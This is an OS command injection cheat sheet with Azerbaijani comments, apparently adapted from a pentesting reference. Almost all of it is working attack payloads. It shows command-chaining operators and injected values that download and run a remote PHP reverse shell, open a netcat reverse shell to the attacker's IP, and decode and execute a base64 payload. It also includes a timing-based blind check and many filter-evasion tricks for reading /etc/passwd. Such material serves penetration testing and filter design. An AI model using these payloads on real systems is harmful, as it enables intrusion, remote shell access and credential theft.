OS Command Injection

#Həm Unixin həm də Windowsun dəsdəklədikləri
ls||id; ls ||id; ls|| id; ls || id # 2 tərəfdə çalışdırılır

ls|id; ls |id; ls| id; ls | id #  2 tərəfdə çalışdırılır (1 dənə pipe istifadə edərək)

ls&&id; ls &&id; ls&& id; ls && id # 1ci yerinə yetirildisə 2cini də çalışdırır

ls&id; ls &id; ls& id; ls & id # 2sidə çalışdırılır ancaq yalnız 2cinin nəticəsi görünür

ls %0A id # %0A 2sini də çalışdırır (Bu daha çox tövsiyyə olunur)

#Yalnız UNİX də istifadə olunanlar
`ls` # ``

$(ls) # $()

ls; id # ; arxa-arxaya əmrlər

ls${LS_COLORS:10:1}${IFS}id # Bu yararlı ola bilər

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php 

vuln=127.0.0.1%0anohup nc -e /bin/bash <öz IP-mizi yazırıq> 80 

vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

?cmd={payload} ?exec={payload}

?command={payload} ?execute{payload}

?ping={payload} ?query={payload}

?jump={payload} ?code={payload}

?reg={payload} ?do={payload}

?func={payload} ?arg={payload}

?option={payload} ?load={payload}

?process={payload} ?step={payload}

?read={payload} ?function={payload}

?req={payload} ?feature={payload}

?exe={payload} ?module={payload}

?payload={payload} ?run={payload} ?print={payload}

aydnn@lichaa▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

#burada istifadəçi adının ilk hərfi s dirsə, sistemdə 5 saniyə müddətində dayanma 
müşahidə olunur. Burda if şərti bizə sorğunun doğru olub-olmamasında kömək edir.


aydnn@lichaa▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

#burada istifadəçi adının ilk hərfi a dırsə, sistemdə 5 saniyə müddətində dayanma 
müşahidə olunmalıdır.  Ancaq belə bir hal baş vermir. Çünkü sorğu səhvdir.

/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost

/usr/bin/who*mi # /usr/bin/whoami

touch -- -la # -- stops processing options after the --
ls *
echo * #List current files and folders with echo and wildcard

# [chars]
/usr/bin/n[c] # /usr/bin/nc

# Dırnaqlar
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64

#Tərs slash-lər
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h

# $@
who$@ami #whoami

# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Böyük hərfdən kiçik hərfə
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformasiya (yalnız bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64


# $0 vasitəsilə
echo whoami|$0

# Başlanmamış dəyişənlər: Başlanmamış dəyişən sıfıra bərabərdir (heç bir şey)
cat$u /etc$u/passwd$u # Hər hansı bir simvoldan əvvəl {} olmadan başlatılmamış dəyişəndən istifadə edin
p${u}i${u}n${u}g # Pingə bərabərdir, işə salınmamış dəyişənləri etibarlı simvollar arasına qoymaq üçün {} istifadə edin

# Fake əmrlər
p$(u)i$(u)n$(u)g # Pingə bərabərdir, lakin "u" yerinə yetirməyə çalışan 3 səhv göstərilir
w`u`h`u`o`u`a`u`m`u`i # whoami-yə bərabərdir, lakin "u"-nu yerinə yetirməyə çalışan 5 səhv göstərilir

# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test

# IFS -Daxili sahə ayırıcı, bu halda hər hansı digər simvol üçün " " dəyişin ("]")
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd

# Komanda xəttini dəyişənə qoyun və sonra icra edin
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # cat-i 2 defe istifade edin
#  Başqa cür, sadəcə olaraq ${IFS} üçün hər yeri dəyişdirin
echo${IFS}test

# hex formatı istifadə edin
X=$'cat\x20/etc/passwd'&&$X

# tablardan istifadə edin
echo "ls\x09-l" | bash

# Yeni sətirlər
p\
i\
n\
g # Bu 4 sətir pingə bərabər olacaq

# Müəyyən edilməmiş dəyişənlər və !
$u $u # Bu history də yadda saxlanılacaq və boşluq kimi istifadə edilə bilər, $u dəyişəninin qeyri-müəyyən olduğuna diqqət yetirin.
uname!-1\-a # uname -a bərabərdir.

# Decimal IPs
127.0.0.1 == 2130706433